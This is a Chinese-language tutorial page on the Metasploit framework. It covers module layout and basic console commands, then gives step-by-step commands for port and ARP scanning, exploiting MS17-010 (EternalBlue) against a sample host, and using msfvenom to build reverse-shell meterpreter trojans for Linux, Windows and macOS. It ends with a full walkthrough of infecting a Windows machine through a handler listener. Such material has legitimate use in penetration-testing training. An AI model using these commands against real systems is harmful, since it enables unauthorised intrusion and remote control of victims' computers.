Metasploit

  • Metasploit介绍
    • 默认安装目录
    • 主要应用文件
    • modules文件内容介绍
    • 目录内容
  • Metasploit使用
    • 常用命令
    • 信息收集之端口扫描
    • 信息收集之c段扫描
    • ms17_010(永恒之蓝)
  • msfvenom
    • 生成木马命令
    • 入侵win全过程

Metasploit介绍

默认安装目录
/usr/share/metasploit-framework
主要应用文件

data:用于储存某些漏洞、单词列表、图像等所需二进制文件的可编辑文件。
documentation:包含框架的可用文档。
lib:Metasploit库文件夹
plugins:用来存放Metasploit插件
scripts:存放Metasploit脚本
tools:存放多种命令的行实用命令
modules:存放Metasploit模块文件 主要应用文件夹

modules文件内容介绍

auxiliaries:辅助模块,执行扫描、嗅探、指纹识别等辅助渗透测试
exploit:漏洞利用模块,其中包含攻击者或测试人针对系统中的漏洞而设计的各种POC验证程序、用于破坏系统安全性的攻击代码等各种漏洞相应的攻击代码
payload:期望目标系统在被渗透攻击之后完成实际攻击的代码
post:用于取得目标系统远程控制权后,进行后渗透的攻击动作,如:获取敏感信息、实施跳板攻击。
encoders:负责免杀,防止被杀毒软件、防火墙等安全软件检测出来

目录内容

Metasploit使用

启动命令 :
msfdb init:初始化数据库
msfconsole:启动命令

常用命令

db_status:数据库连接状态
workspace:查看工作区
db_nmap:启动nmap-
show exploits :查看所有可用渗透攻击代码程序
show auxiliary:查看所有可用的辅助攻击工具
show options:查看可用选项
show payloads:查看该模块适用的所有载荷代码
show targets:查看该模块适用的攻击目标类型
search:显示某模块详细信息
use:设置渗透攻击模块
back:回退

信息收集之端口扫描
使用辅助模块进行扫描
seach portscan #查看端口扫描的方法
use auxiliary/scanner/portscan/syn  #使用syn方式扫描端口

show options #查看使用选项

set #设置参数

run # 运行脚本

信息收集之c段扫描
使用方法一致:
back #返回
search  discovery#查看c段扫描方法
use auxiliary/scanner/discovery/arp_sweep  #使用arp_sweep进行扫描
show options #查看参数选项
set RHOSTS 扫描地址
run  #运行

ms17_010(永恒之蓝)
步骤
msfconsole
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.2.2
run
use exploit/windows/smb/ms17_010_psexec
show options
set RHOSTS 192.168.2.2
exploit

获取meterpreter权限后操作查看:https://blog.csdn.net/qq_41158271/article/details/129685508?spm=1001.2014.3001.5501

msfvenom

常用选项

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-f, --format < format> 指定输出格式
-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64
-o, --out < path> 指定创建好的payload的存放位置
-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘\x0f’、‘\x00’
-n, --nopsled < length> 为payload预先指定一个NOP滑动长度
-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小
-i, --iterations < count> 指定payload的编码次数
-c, --add-code < path> 指定一个附加的win32 shellcode文件
-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
-v, --var-name < value> 指定一个自定义的变量,以确定输出格式
-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)
-h,–help 查看帮助选项
–platform < platform> 指定payload的目标平台

生成木马命令
linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your Ip Address> LPORT =<Your Port to Connect On> -f elf>shell.elff
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target Ip Address> LPORT=<Your Port to Connect on> -f elf >shell.elf
windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your Ip Address>LPORT=<Your Port to Connect On> -f exe>shell.exe
mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your Ip Addess> LPORT =<Your Port to Connect on>-f macho>shell.macho
入侵win全过程
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.0.0.1 lport=4444 -f exe >hello.exe  #生成木马
use exploit/multi/handler  #使用handler模块
set payload windows/meterpreter/reverse_tcp #进行监听设置
set  lhost 192.0.0.1
set lport 4444
exploit -j  #后台运行
jobs  可查看后台运行任务靶机运行:
靶机运行生成的exe文件

【网络安全】Metasploit工具相关推荐

  1. 网管必备的十大网络安全测试工具

    网管必备的十大网络安全测试工具 http://blog.csdn.net/wangxiaofei2006/article/details/17007235

  2. kali初讲——Metasploit工具MSF初学

    Metasploit--MSF 文章目录 Metasploit--MSF 导论 一.Metasploit简介 二.Metasploit模块介绍 三.MSF基础指令 四.MSF常用模块粗讲 五.msf搜 ...

  3. Metasploit工具使用(下)

    Metasploit工具使用 1.Metasploit简介 1.1.Metasploit下载 1.2.其它参考 1.3.本章简述 2.Meterpreter 2.1.简介 2.2.优点 2.3.注意事 ...

  4. 黑基网博客——网络安全、工具软件、无线智能设备、编程开发、网赚分享与交流基地

    黑基网博客--网络安全.工具软件.无线智能设备.编程开发.网赚分享与交流基地 黑基网博客:http://www.heijiwang.cn 手机黑基网:http://heijiwang.cn 五百人免费 ...

  5. 【重磅!】Certihash正在与IBM合作开发一款名为“哨兵节点(Sentinel Node)”的网络安全检测工具

    发表时间:2022年4月28日 信息来源:bitcoinassociation.net Certihash的"哨兵节点(Sentinel Node)"软件计划成为下一代的网络安全检 ...

  6. 网络安全-02-BurpSuite工具安装

    网络安全-02-BurpSuite工具安装

  7. Metasploit工具

    一. 简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性.Metasploit Framewo ...

  8. 网络安全单兵工具 -- YAKIT

    网络安全单兵工具 -- YAKIT 一.下载及安装 1.原作者及下载地址 https://github.com/yaklang/yakit 2.双击下载好的exe文件,点击核心引擎安装与升级 3.点击 ...

  9. 网络安全初学者工具安装:Kali,Windows xp虚拟机,pikachu靶场,burpsuite安装配置,phpstudy安装(学习笔记)

             摘要 在互联网发展的时代背景下,网络安全成为了越来越不可忽视的重要领域,为此,各国都采取了维护网络安全的举措,对于网络安全人才的需求不断增大,我国作为世界上最多使用计算机人口的国家, ...

最新文章

  1. 塞尔达 amiibo数据_塞尔达传说:旷野之息Amiibo道具制作_碧海风云
  2. 如何自动判断url中汉字的编码格式
  3. mysql按字段同步_MySQL同步(一) 基础知识
  4. 专题导读:科学数据治理
  5. fastreport 横向分栏_FastReport开发指南
  6. Image.fromarray的用法(实现array到image的转换)
  7. html5 jquery音乐播放器,play()和pause()不起作用
  8. 纯C++编写Win32/X64通用Shellcode注入csrss进程
  9. Fbinst增强版 命令详解
  10. python保存excel文件列宽自适应解决方案
  11. windows事件查看器
  12. 美食数据接口API (豆果美食NodeJs版API)
  13. 小程序报错 TypeError: Cannot read property getPreloadAdUnitIds ?
  14. SQL -- 游标(详细)
  15. 2022年登高架设试题及解析及登高架设模拟试题
  16. 中台实践:数据中台构建五步法
  17. 家装有必要用阻燃电线吗?
  18. “封神台”靶场跑不了爆破,临时解决办法(亲测有效)
  19. 设计模式-03(软件设计原则)
  20. C# winform 关于treeView控件的实战

热门文章

  1. 哥德巴赫猜想(转载)
  2. 负数在计算机中表示方法
  3. pythonfunc函数的功能,python函数中def func(*args)这里*的作用是什么?
  4. NAT原理与NAT穿透
  5. 使用Dockerfile创建openoffice镜像
  6. 城市地铁是怎样建成的?
  7. 漏洞挖掘之 SQL 注入挖掘
  8. ECC加密;easy_ECC
  9. 电线电缆的五大种类解释及结构意义(转载)
  10. html两个tab页面,html如何实现tab页面切换